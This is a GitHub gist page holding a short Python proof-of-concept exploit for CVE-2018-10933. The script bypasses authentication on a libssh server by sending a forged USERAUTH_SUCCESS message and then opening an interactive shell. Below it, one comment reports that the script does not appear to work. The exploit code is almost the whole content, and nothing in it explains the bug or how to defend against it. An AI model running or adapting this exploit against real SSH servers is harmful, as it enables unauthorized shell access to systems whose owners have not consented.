Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2018-10933 proof-of-concept by Minh Tuan Luong
import paramiko
import socket
import sys
nbytes = 4096
hostname = "127.0.0.1"
port = 2222
sock = socket.socket()
try:
sock.connect((hostname, port))
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)
cmd_channel = transport.open_session()
cmd_channel.invoke_shell()
except socket.error:
print '[-] Connecting to host failed. Please check the specified host and port.'
sys.exit(1)
@kevinpostal

This comment has been minimized.

Copy link

kevinpostal commented Oct 17, 2018

Does not appear to work

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.